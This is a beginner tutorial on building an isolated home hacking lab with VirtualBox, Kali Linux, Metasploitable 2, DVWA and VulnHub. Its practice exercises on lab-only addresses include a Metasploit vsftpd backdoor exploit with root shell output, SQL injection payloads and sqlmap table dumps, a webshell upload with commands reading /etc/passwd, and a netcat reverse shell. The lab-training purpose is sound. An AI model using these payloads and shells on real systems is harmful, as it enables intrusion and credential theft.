How to Set Up a Home Hacking Lab for Beginners (Free and Legal) (2026)

how to setup lab
how to setup lab
By HOC Team Β |Β  Last updated: July 2026 Β | Read time: ~20 min

Every ethical hacker, penetration tester, and security researcher needs a place to practise β€” a controlled environment where they can run attacks, break things, and learn from the results without touching systems they do not own. That environment is a home hacking lab. Building one is free, takes an afternoon, and is one of the most important things you can do to accelerate your security skills.

This guide walks through building a complete home lab from scratch: selecting hardware, installing VirtualBox, setting up Kali Linux as your attacking machine, configuring deliberately vulnerable VMs as targets (Metasploitable 2, DVWA, VulnHub machines), creating an isolated network so nothing spills onto the internet, and a set of first exercises to run the moment your lab is ready. Everything here is free and completely legal β€” you are attacking machines you own, in a network you control.

1. What you need β€” hardware requirements and free software
πŸ’»
Minimum vs recommended hardware
Your existing PC is probably fine
ComponentMinimum (works)Recommended (comfortable)Why it matters
RAM8 GB16 GBRunning 2–3 VMs simultaneously needs headroom. Kali needs 2GB, each target VM needs 512MB–1GB.
CPU4-core, any modern processor6–8 core with virtualisation supportVirtualisation extensions (Intel VT-x / AMD-V) must be enabled in BIOS. Check: most CPUs since 2012 support this.
Storage50 GB free100–200 GB free (SSD preferred)Kali VM β‰ˆ 20GB, each target VM β‰ˆ 5–8GB, snapshots add more. SSD makes VM boot and tool execution much faster.
OS (host)Windows 10/11, macOS, LinuxAny of the aboveVirtualBox runs on all three. If your host is Linux, performance is slightly better. Windows is most common.
InternetAny broadbandAny broadbandOnly needed to download the initial VMs. The lab itself runs offline.
8 GB RAM is workable but tight. With 8 GB, run Kali at 2 GB and one target VM at 512 MB β€” keep the rest for your host OS. Close your browser while the lab is running. With 16 GB you can run Kali plus two target VMs simultaneously and keep your host comfortable. If you only have 8 GB, the cloud lab options in Section 9 are an excellent alternative with no hardware constraints.
πŸ“¦
Everything you will download β€” all free
Total download: ~8 GB
  • VirtualBox β€” the hypervisor that runs all your VMs. Free, open-source, runs on Windows/macOS/Linux. virtualbox.org
  • VirtualBox Extension Pack β€” adds USB 3.0, RDP, and disk encryption support. Free for personal use. Download from the same page.
  • Kali Linux β€” pre-built VirtualBox image (~3 GB). Download from kali.org/get-kali β€” choose "VirtualBox" under Virtual Machines.
  • Metasploitable 2 β€” intentionally vulnerable Linux VM (~900 MB). Download from sourceforge.net/projects/metasploitable
  • DVWA (Damn Vulnerable Web Application) β€” can be run inside Metasploitable 2 (already included) or as a standalone Docker container on Kali.
  • VulnHub machines β€” hundreds of free downloadable VMs of varying difficulty. vulnhub.com
2. Lab architecture β€” how the pieces fit together
Home hacking lab network architecture β€” isolated host-only network keeps vulnerable VMs off the internet
Home Lab Network Architecture 🌐 Internet (outside your lab) πŸ–₯ Host Computer (your physical machine) VirtualBox β€” Host-Only Network: 192.168.56.0/24 πŸ‰ Kali Linux ATTACKER 192.168.56.101 RAM: 2048 MB Adapter 1: NAT (internet) Adapter 2: Host-only Nmap Β· Metasploit Β· Burp 🎯 Metasploitable 2 TARGET VM 1 192.168.56.102 RAM: 512 MB Adapter: Host-only ONLY ⚠ No internet access FTPΒ·SSHΒ·HTTPΒ·SMBΒ·MySQL 🌐 DVWA / WebGoat TARGET VM 2 192.168.56.103 RAM: 512 MB Adapter: Host-only ONLY ⚠ No internet access SQLiΒ·XSSΒ·CSRFΒ·FileUpload Kali only (NAT) πŸ”₯ Targets NEVER reach internet
πŸ’‘ The critical rule β€” target VMs must never reach the internet Metasploitable 2 and DVWA are intentionally full of vulnerabilities. If they have internet access, a real attacker could discover and exploit them. Configure their network adapter to Host-only only β€” no NAT, no Bridged. Kali gets both NAT (for updates and tool downloads) and Host-only (to reach the targets). This is the single most important network configuration decision in your lab.
3. Step 1 β€” Install VirtualBox
πŸ“¦
Install VirtualBox on Windows, macOS, or Linux
~10 minutes
Windows
# Option 1 β€” Download installer from virtualbox.org # Go to: https://www.virtualbox.org/wiki/Downloads # Download: "Windows hosts" β†’ run the .exe installer # Accept all defaults β†’ Install# Option 2 β€” Winget (Windows Package Manager) winget install Oracle.VirtualBox# Enable virtualisation in BIOS if VMs fail to start: # Restart PC β†’ press Delete/F2/F12 to enter BIOS # Find: Intel Virtualization Technology (VT-x) or AMD-V β†’ Enable # Save and exit
macOS
# Option 1 β€” Homebrew brew install --cask virtualbox brew install --cask virtualbox-extension-pack# Option 2 β€” Download .dmg from virtualbox.org # macOS 12+: System Settings β†’ Privacy & Security β†’ allow VirtualBox kernel extension # Apple Silicon (M1/M2/M3): Use VMware Fusion (free for personal use) instead # or UTM (free) β€” VirtualBox x86 support on ARM is limited
Linux (Ubuntu / Kali host)
sudo apt update sudo apt install virtualbox virtualbox-ext-pack -y # Add your user to vboxusers group sudo usermod -aG vboxusers $USER # Log out and back in
Install the Extension Pack (all platforms)
# After installing VirtualBox: # Download Extension Pack from the same VirtualBox downloads page # In VirtualBox: File β†’ Preferences β†’ Extensions β†’ Add (+ button) # Select the downloaded .vbox-extpack file β†’ Install β†’ Accept licence
πŸ’‘ Apple Silicon users (M1/M2/M3/M4) VirtualBox's x86 emulation on Apple Silicon is slow and experimental. Use UTM (free, from utm.app) or VMware Fusion (free for personal use) instead β€” both have native ARM support and run ARM-based Kali Linux properly. For x86 VMs like Metasploitable 2, UTM's QEMU emulation mode works but is slower. An alternative is using cloud labs (Section 9) which have no hardware requirements.
4. Step 2 β€” Set up Kali Linux (your attacking machine)
πŸ‰
Kali Linux 2026.x
Your attacker machine β€” 600+ pre-installed security tools
Free Pre-built VirtualBox image ~3 GB download
RAM allocation
2048 MB minimum
CPU cores
2 cores
Disk
~80 GB (pre-set)
Default login
kali / kali
Network
NAT + Host-only

Download the pre-built VirtualBox image from kali.org β€” this is the fastest way to get a working Kali VM. The image imports directly into VirtualBox in minutes and comes with all 600+ tools pre-installed and configured.

Download and import
# Step 1 β€” Download the Kali VirtualBox image # Go to: https://www.kali.org/get-kali/#kali-virtual-machines # Select: VirtualBox (64-bit) # Download the .7z file (~3 GB)# Step 2 β€” Extract the .7z file (install 7-Zip on Windows first) # Or use: 7z x kali-linux-2026.x-virtualbox-amd64.7z# Step 3 β€” Import into VirtualBox # File β†’ Import Appliance β†’ select the .ova file β†’ Next β†’ Import # Wait 2–3 minutes for import to complete# Step 4 β€” Configure network adapters # Right-click the Kali VM β†’ Settings β†’ Network # Adapter 1: NAT (gives Kali internet access for updates) # Adapter 2: Enable β†’ Host-only Adapter β†’ vboxnet0 # Click OK# Step 5 β€” Start the VM and log in # Username: kali # Password: kali # Change the password immediately: passwd
First-boot setup
# Update all packages (do this before anything else) sudo apt update && sudo apt full-upgrade -y# Install VirtualBox Guest Additions (better resolution + clipboard sharing) sudo apt install virtualbox-guest-x11 -y sudo reboot# Verify your IP on the host-only adapter (should be 192.168.56.x) ip addr show eth1 # Or: ip addr | grep 192.168.56# Verify internet access on eth0 (NAT) ping -c 3 8.8.8.8# Check Metasploit is working msfconsole -q -x "version; exit"
Enable clipboard sharing immediately. In VirtualBox menu while Kali is running: Devices β†’ Shared Clipboard β†’ Bidirectional. Also enable Devices β†’ Drag and Drop β†’ Bidirectional. These two settings make the lab drastically more comfortable to work in β€” you can copy commands from your host browser directly into the Kali terminal.
5. Step 3 β€” Configure an isolated host-only network
πŸ”’
Create the vboxnet0 host-only network
Do this before adding target VMs
1
Open VirtualBox Network Manager
In VirtualBox main window: File β†’ Tools β†’ Network Manager (VirtualBox 7.x) or File β†’ Host Network Manager (older versions). Click the Create button to add a new host-only network.
2
Configure the network
Select the newly created network (usually vboxnet0). Set: IPv4 Address: 192.168.56.1, IPv4 Network Mask: 255.255.255.0. Under the DHCP Server tab: Enable DHCP Server, Server Address: 192.168.56.100, Lower limit: 192.168.56.101, Upper limit: 192.168.56.200. Click Apply.
3
Verify from Kali
Start Kali, open a terminal, and run ip addr. You should see an eth1 interface with an IP in the 192.168.56.x range. If not, run sudo dhclient eth1 to request a DHCP lease.
# Verify host-only adapter in Kali ip addr show eth1 # Expected output: 3: eth1: mtu 1500 inet 192.168.56.101/24 brd 192.168.56.255 scope global dynamic eth1# If no IP shown, request one: sudo dhclient eth1# Test connectivity to the DHCP server (your host machine) ping -c 2 192.168.56.1
6. Step 4 β€” Add Metasploitable 2 (your first target)
🎯
Metasploitable 2
The most popular intentionally vulnerable VM β€” packed with real exploitable services
Intentionally vulnerable Free ~900 MB
RAM allocation
512 MB
Default login
msfadmin / msfadmin
Network
Host-only ONLY
Vulnerable services
FTP, SSH, HTTP, SMB, MySQL, PostgreSQL + more
CVEs inside
20+ exploitable

Metasploitable 2 is a Linux server deliberately configured with 20+ known vulnerabilities across every major service category. It is the closest thing to a real production server with real vulnerabilities you can practice on legally. It ships with vsftpd 2.3.4 (backdoor), Samba usermap script vulnerability, UnrealIRCd backdoor, PHP CGI argument injection, and many more β€” all exploitable with Metasploit Framework modules.

Import into VirtualBox
# Download from SourceForge: # https://sourceforge.net/projects/metasploitable/ # Download: Metasploitable2-Linux.zip (~900 MB) # Extract to get: Metasploitable.vmdk (the virtual disk)# In VirtualBox: New VM # Name: Metasploitable2 # Type: Linux β†’ Ubuntu (64-bit) # RAM: 512 MB # Storage: "Use an existing virtual hard disk file" # β†’ Click folder icon β†’ Add β†’ select Metasploitable.vmdk# CRITICAL: Configure network before booting # Settings β†’ Network β†’ Adapter 1: # Attached to: Host-only Adapter # Name: vboxnet0 # DO NOT enable NAT or Bridged β€” this VM must not reach the internet# Start the VM and log in: # Login: msfadmin # Password: msfadmin# Find the VM's IP address: ifconfig eth0 # Note the inet addr β€” usually 192.168.56.102
Verify from Kali β€” your first Nmap scan
# From Kali, scan Metasploitable to confirm connectivity nmap -sV 192.168.56.102# Expected output β€” you should see many open ports: PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.3.4 22/tcp open ssh OpenSSH 4.7p1 23/tcp open telnet Linux telnetd 25/tcp open smtp Postfix smtpd 80/tcp open http Apache httpd 2.2.8 139/tcp open netbios-ssn Samba smbd 3.X 445/tcp open netbios-ssn Samba smbd 3.X 3306/tcp open mysql MySQL 5.0.51a 5432/tcp open postgresql PostgreSQL# Congratulations β€” your lab is working!
What you can practice on Metasploitable 2: Every open port is an attack vector. FTP on port 21 runs vsftpd 2.3.4 which has a famous backdoor (Metasploit module: exploit/unix/ftp/vsftpd_234_backdoor). Port 80 runs a vulnerable DVWA web application. Samba on 445 is vulnerable to the usermap_script vulnerability. IRC on 6667 runs UnrealIRCd with a backdoor. Start with the vsftpd exploit β€” it is a one-command root shell and a perfect first Metasploit exercise.
7. Step 5 β€” Add DVWA (web application target)
🌐
DVWA β€” Damn Vulnerable Web Application
The standard training ground for every web vulnerability class
Web app testing Free Already in Metasploitable
Access URL
http://192.168.56.102/dvwa
Login
admin / password
Difficulty
Low / Medium / High / Impossible
Vulnerabilities
SQLi, XSS, CSRF, File Upload, Command Injection + more

DVWA is a PHP/MySQL web application deliberately built with every major OWASP vulnerability class. It is already installed on Metasploitable 2 β€” access it from Kali's browser at http://192.168.56.102/dvwa. It has four difficulty levels: Low (no defences β€” learn the attack), Medium (basic defences β€” learn to bypass), High (stronger defences β€” more advanced bypasses), and Impossible (the correct secure implementation β€” learn what good looks like).

Access and configure DVWA
# From Kali's Firefox browser, navigate to: # http://192.168.56.102/dvwa/setup.php # Click "Create / Reset Database" button # Then navigate to: http://192.168.56.102/dvwa/login.php # Username: admin # Password: password# Set difficulty to Low for learning each attack first: # DVWA Security β†’ Security Level β†’ Low β†’ Submit
Run DVWA as a standalone Docker container on Kali (alternative)
# If you want a standalone DVWA separate from Metasploitable: sudo apt install docker.io -y sudo systemctl start docker sudo docker pull vulnerables/web-dvwa sudo docker run -d -p 80:80 vulnerables/web-dvwa # Access at: http://127.0.0.1/dvwa # Login: admin / password # Setup: http://127.0.0.1/dvwa/setup.php β†’ Create Database
DVWA vulnerability modules to work through in order
  • Brute Force β€” use Burp Suite Intruder to brute-force the login with a wordlist. Start here β€” teaches you Burp workflow.
  • Command Injection β€” inject OS commands into the ping tool. Classic beginner vulnerability.
  • SQL Injection β€” manual SQLi, then automated with sqlmap. The most important web vulnerability class to understand.
  • SQL Injection (Blind) β€” same as above but without visible error output. Teaches inference-based exploitation.
  • XSS (Reflected) β€” inject JavaScript into a reflected input field.
  • XSS (Stored) β€” inject JavaScript that persists in the database and fires for every visitor.
  • File Upload β€” upload a PHP webshell disguised as an image. Classic way to get code execution on web servers.
  • CSRF β€” craft a malicious link that changes the victim's password when clicked.
The correct order: Always complete each module at Low difficulty before attempting Medium. At Low, there are zero defences β€” you learn the core attack mechanic. At Medium, basic defences are added β€” you learn to bypass them. This layered approach builds both attack knowledge and defence understanding simultaneously, which is exactly what makes candidates stand out in interviews.
8. Step 6 β€” VulnHub machines (unlimited CTF-style targets)
πŸ†
VulnHub β€” hundreds of free downloadable vulnerable VMs
Free Β· 800+ machines

VulnHub is a community repository of downloadable vulnerable VMs β€” each designed as a CTF-style challenge where your goal is to find a foothold, escalate privileges, and capture a root flag. With 800+ machines ranging from absolute beginner to expert level, it provides essentially unlimited practice material for every skill level.

Recommended beginner-friendly VulnHub machines (in order)
MachineDifficultyWhat you practiseDownload
Mr. Robot: 1⭐⭐ Easy–MediumWeb enumeration, WordPress exploitation, privilege escalation via SUIDvulnhub.com/entry/mr-robot-1,151/
Kioptrix: Level 1⭐ EasyNmap scanning, Samba exploitation with Metasploit, first root shellvulnhub.com/entry/kioptrix-level-1-1,22/
Basic Pentesting: 1⭐ EasyEnumeration, FTP exploitation, SSH brute force, privilege escalationvulnhub.com/entry/basic-pentesting-1,216/
DC: 1⭐⭐ Easy–MediumDrupal exploitation, Python reverse shell, Linux privilege escalationvulnhub.com/entry/dc-1,292/
SkyTower: 1⭐⭐ MediumSQL injection for login bypass, SSH tunnelling, privilege escalationvulnhub.com/entry/skytower-1,96/
Import any VulnHub machine
# 1. Download the .ova or .vmdk from vulnhub.com # 2. If .ova: File β†’ Import Appliance β†’ select .ova β†’ Import # 3. If .vmdk: New VM β†’ Use existing disk β†’ select .vmdk# CRITICAL: Before starting β€” set network to Host-only # Settings β†’ Network β†’ Adapter 1 β†’ Host-only Adapter β†’ vboxnet0# 4. Boot the VM # 5. From Kali, discover its IP: nmap -sn 192.168.56.0/24 # The new machine will appear as a host in the 192.168.56.x range# 6. Start your enumeration: nmap -sV -sC -p- 192.168.56.xxx -oN scan.txt
Read writeups after 2 hours, not before. When you get stuck on a VulnHub machine β€” and you will β€” give yourself at least 2 hours of genuine effort before reading a writeup. The frustration period is where the real learning happens. When you do read the writeup, compare the approach to what you tried and understand exactly where your methodology diverged. After completing 10 machines with writeup comparison, your independent problem-solving improves dramatically.
9. Step 7 β€” Cloud labs (no hardware required)

If your hardware does not meet the requirements for running VMs locally, or you want additional practice environments, these cloud-based labs provide browser-accessible hacking environments with zero setup:

PlatformFree tierBest forURL
TryHackMeβœ… Many free roomsStructured learning paths, guided challenges, perfect for complete beginners. "Pre-Security", "Jr Penetration Tester", and "SOC Level 1" paths are excellent free starting points.tryhackme.com
HackTheBoxβœ… 2 free active machinesRealistic CTF-style machines at every difficulty. More challenging than TryHackMe β€” work through TryHackMe basics first. HTB Academy has free modules.hackthebox.com
PortSwigger Web Security Academyβœ… Completely freeThe gold standard for web application security labs. Every OWASP vulnerability class has interactive labs that can be solved directly in the browser. Essential for bug bounty preparation.portswigger.net/web-security
PentesterLabβœ… Free exercisesWeb vulnerability exercises from beginner to advanced. SQLi, XSS, file inclusion, deserialization β€” all hands-on with real applications.pentesterlab.com
OWASP WebGoatβœ… Free (Docker)Runs locally in Docker β€” a deliberately insecure Java application with lessons and interactive challenges for each vulnerability. docker pull webgoat/webgoatowasp.org/WebGoat
Hack The Box Sherlocksβœ… Some freeBlue team / DFIR challenges β€” PCAP analysis, log forensics, malware triage. Good for SOC analyst skill building alongside offensive work.hackthebox.com/sherlocks
πŸ’‘ Recommended learning stack: TryHackMe first, then HackTheBox TryHackMe provides guided learning with hints and structured paths β€” ideal for complete beginners who need to build foundational knowledge. Once you have completed a learning path (aim for "Jr Penetration Tester"), move to HackTheBox where machines are less guided and closer to real-world scenarios. Use your home lab for free-form practice and PortSwigger Academy for web-specific skills. These four together cover everything needed to begin professional penetration testing.
10. Step 8 β€” Your first attacks β€” what to try first

Your lab is up and running. Here is an ordered sequence of first exercises that progressively build from reconnaissance to exploitation β€” all on Metasploitable 2.

⚑
Exercise 1 β€” Your first Nmap scan
Start here
# Full service and version scan β€” the standard first step on any target nmap -sV -sC -p- 192.168.56.102 -oN metasploitable_scan.txt # -sV: detect service versions # -sC: run default NSE scripts # -p-: scan all 65535 ports (not just the top 1000) # -oN: save output to a file# Faster version β€” just top ports with OS detection nmap -A -T4 192.168.56.102# What to do with the output: # 1. List every open port and its service # 2. Note any version numbers β€” search them for known CVEs # 3. Focus on: FTP (21), HTTP (80), SMB (445), any unusual high ports
πŸ’₯
Exercise 2 β€” First Metasploit exploit (vsftpd backdoor)
First shell
# The vsftpd 2.3.4 backdoor is the classic first Metasploit exercise # It gives root access in 3 commandsmsfconsole msf6 > use exploit/unix/ftp/vsftpd_234_backdoor msf6 exploit(vsftpd_234_backdoor) > set RHOSTS 192.168.56.102 msf6 exploit(vsftpd_234_backdoor) > run# Expected result: [*] 192.168.56.102:21 - Banner: 220 (vsFTPd 2.3.4) [*] 192.168.56.102:21 - USER: 331 Please specify the password. [+] 192.168.56.102:21 - Backdoor service has been spawned, handling... [+] 192.168.56.102:21 - UID: uid=0(root) gid=0(root) [*] Found shell. [*] Command shell session 1 openedid # uid=0(root) β€” you have root! whoami # root cat /etc/passwd
What just happened: vsftpd 2.3.4 contains a backdoor introduced by an attacker who compromised the source code. Sending a username containing a smiley face πŸ™‚ causes the server to open a shell on port 6200. The Metasploit module automates this entire process. This is a real CVE (CVE-2011-2523) that was present on real internet-facing servers for years β€” understanding it teaches you both how backdoors work and how exploitation frameworks automate the process.
🌐
Exercise 3 β€” Web app recon and SQL injection on DVWA
Web hacking
# Open Kali's Firefox browser # Navigate to: http://192.168.56.102/dvwa/login.php # Log in: admin / password # Set Security Level to: Low # Navigate to: SQL Injection# The page asks for a user ID. Normal input returns a name. # Test for SQLi with a single quote: 1' # If you see a MySQL error β†’ SQL injection is present# Basic injection to dump all users: 1' OR '1'='1 # Returns all users in the database# Union-based injection to get database version: 1' UNION SELECT null, version()-- -# Now automate with sqlmap (from Kali terminal): # First, get the login cookie from Firefox (Developer Tools β†’ Storage) # Then: sqlmap -u "http://192.168.56.102/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" \ --cookie="PHPSESSID=YOUR_SESSION_ID; security=low" \ --dbs # --dbs lists all databases on the serversqlmap -u "http://192.168.56.102/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" \ --cookie="PHPSESSID=YOUR_SESSION_ID; security=low" \ -D dvwa --tables # List tables in the dvwa databasesqlmap -u "http://192.168.56.102/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" \ --cookie="PHPSESSID=YOUR_SESSION_ID; security=low" \ -D dvwa -T users --dump # Dump the users table
πŸ“
Exercise 4 β€” File upload PHP webshell
Code execution
# DVWA β†’ File Upload β†’ Security: Low # Create a PHP webshell file on Kali: echo '' > shell.php# Upload shell.php through the DVWA file upload form # DVWA will show the upload path: ../../hackable/uploads/shell.php# Access your webshell through the browser: # http://192.168.56.102/dvwa/hackable/uploads/shell.php?cmd=id # Should return: uid=33(www-data) gid=33(www-data) groups=33(www-data)# Run any Linux command: # ?cmd=whoami # ?cmd=ls /etc # ?cmd=cat /etc/passwd# Get a reverse shell back to Kali: # On Kali β€” start a listener: nc -lvnp 4444 # In the browser β€” trigger the reverse shell: # ?cmd=nc -e /bin/sh 192.168.56.101 4444
11. Troubleshooting common lab setup issues
ProblemCauseFix
VM fails to start: "VT-x is disabled in BIOS"Hardware virtualisation not enabledRestart PC β†’ BIOS β†’ find "Intel VT-x" or "AMD-V" β†’ Enable β†’ Save
Kali has no internet on eth0NAT adapter not configuredVM Settings β†’ Network β†’ Adapter 1 β†’ Attached to: NAT β†’ OK β†’ restart VM
Can't ping Metasploitable from KaliHost-only network not created, or target VM using wrong adapterCheck both VMs are on the same vboxnet0 adapter; run nmap -sn 192.168.56.0/24 from Kali to discover the target's actual IP
DVWA shows "Could not connect to the database"Database not initialisedNavigate to http://[IP]/dvwa/setup.php and click "Create / Reset Database"
Metasploitable IP not knownDHCP assigned a different addressLog into Metasploitable console β†’ run ifconfig; or from Kali run nmap -sn 192.168.56.0/24
Kali resolution stuck at 640x480Guest Additions not installedsudo apt install virtualbox-guest-x11 -y && sudo reboot
VulnHub VM gets no IPDHCP server not running or wrong adapterConfirm the VM is on vboxnet0 host-only network; check DHCP is enabled in VirtualBox Network Manager
Metasploit exploit fails / "Exploit completed, but no session"Wrong RHOSTS or target patchedVerify target IP is correct; run nmap -sV [IP] -p [port] to confirm the vulnerable service version is present
Apple Silicon: VMs very slowx86 emulation on ARMUse UTM with ARM-based Kali, or switch to TryHackMe / HackTheBox cloud labs which have no hardware requirements

⚑ Your lab is ready β€” here's what to do next

  1. Work through all DVWA modules at Low, then Medium difficulty β€” command injection, SQLi, XSS, file upload, CSRF. Each one teaches a real vulnerability class you will find in bug bounty programmes. Start today β€” your lab is ready.
  2. Learn Nmap properly β€” everything in your lab starts with a scan. Understanding every Nmap flag, scan type, and output format makes every subsequent step more effective. Complete Nmap tutorial β†’
  3. Master Burp Suite for web testing β€” the Proxy, Repeater, and Intruder tabs are essential for DVWA and every web vulnerability you will find. Burp Suite tutorial β†’
  4. Download and root your first VulnHub machine β€” start with Kioptrix Level 1. It is designed for absolute beginners and teaches the complete attack chain: scan β†’ identify vulnerability β†’ exploit with Metasploit β†’ root shell. vulnhub.com/entry/kioptrix-level-1-1,22/
  5. Move to bug bounty hunting when ready β€” your home lab builds the skills; bug bounty programmes let you apply them legally on real targets for real money. Bug bounty guide for beginners β†’
  6. Understand what real vulnerabilities look like β€” the CVEs you exploit in your lab are based on real-world vulnerabilities. 10 real-world CVEs explained β†’
Frequently asked questions
Is it legal to set up a home hacking lab?

Completely legal. Everything in your home lab β€” Kali Linux, Metasploitable 2, DVWA, and VulnHub machines β€” are systems you own and control. You have full permission to attack them. The isolated host-only network means your attack traffic never leaves your machine. Setting up and using a home lab is not only legal but actively encouraged by the security community as the correct way to build hands-on skills.

Can I build a home lab on a laptop with 8 GB RAM?

Yes, with some care. Allocate 2 GB to Kali Linux and 512 MB to your target VM, leaving the rest for your host operating system. Run only one target VM at a time. Close your browser and other applications while the lab is running. On 8 GB you cannot run multiple VMs simultaneously, but for most exercises you only need one target running at once. If 8 GB is too tight, the cloud lab options (TryHackMe, HackTheBox, PortSwigger Academy) work on any hardware through a browser.

Why use VirtualBox instead of VMware?

VirtualBox is completely free for all use cases including commercial, while VMware Workstation Pro requires a paid licence on Windows and Linux (VMware Fusion is free on macOS). Kali Linux provides pre-built VirtualBox images that import with one click. For a beginner home lab, VirtualBox is the recommended choice. If your organisation uses VMware, the concepts are identical β€” just the UI differs slightly. On Apple Silicon, VMware Fusion is actually the better choice for native ARM performance.

What is the difference between Metasploitable 2 and DVWA?

Metasploitable 2 is a full Linux server with vulnerabilities across every service layer β€” FTP, SSH, Telnet, Samba, MySQL, web applications, and more. It teaches network-level exploitation and service-based attacks. DVWA (Damn Vulnerable Web Application) is a PHP web application with web-specific vulnerabilities β€” SQL injection, XSS, CSRF, file upload, command injection. Both are essential: Metasploitable for learning network pentesting and Metasploit Framework, DVWA for learning web application security and Burp Suite. DVWA actually comes pre-installed on Metasploitable 2.

Do I need to install Kali Linux as my main operating system?

No β€” and for most people, you should not. Running Kali as a VM inside your existing operating system is the recommended approach. It is safer (an isolated environment where mistakes do not affect your main system), easier to manage (VirtualBox snapshots let you restore to a clean state instantly), and more convenient (you keep your regular OS for everyday work). Only install Kali as a primary OS if you have a dedicated machine specifically for security work.

What should I practise first after setting up the lab?

In this order: (1) Run an Nmap scan against Metasploitable 2 and understand every open port and service. (2) Exploit the vsftpd backdoor with Metasploit β€” your first remote shell. (3) Open DVWA and complete the Command Injection module at Low difficulty. (4) Complete the SQL Injection module manually, then with sqlmap. (5) Complete the File Upload module and get a PHP webshell working. These five exercises teach the core skills underlying most penetration testing and bug bounty work.

How do I keep my target VMs isolated from the internet?

Set the network adapter for Metasploitable 2, DVWA, and all VulnHub machines to Host-only only in VirtualBox settings. Do not add a NAT adapter to these VMs. The Host-only network creates a private network between your VMs and your host computer that has no route to the internet. Kali Linux should have two adapters: NAT (for internet access to download tools and updates) and Host-only (to communicate with the targets). This configuration is shown in the network diagram in Section 2.

Previous Article
linux ghostlock

15-Year-Old GhostLock Bug Hits Linux - Grants Root Access

Related Posts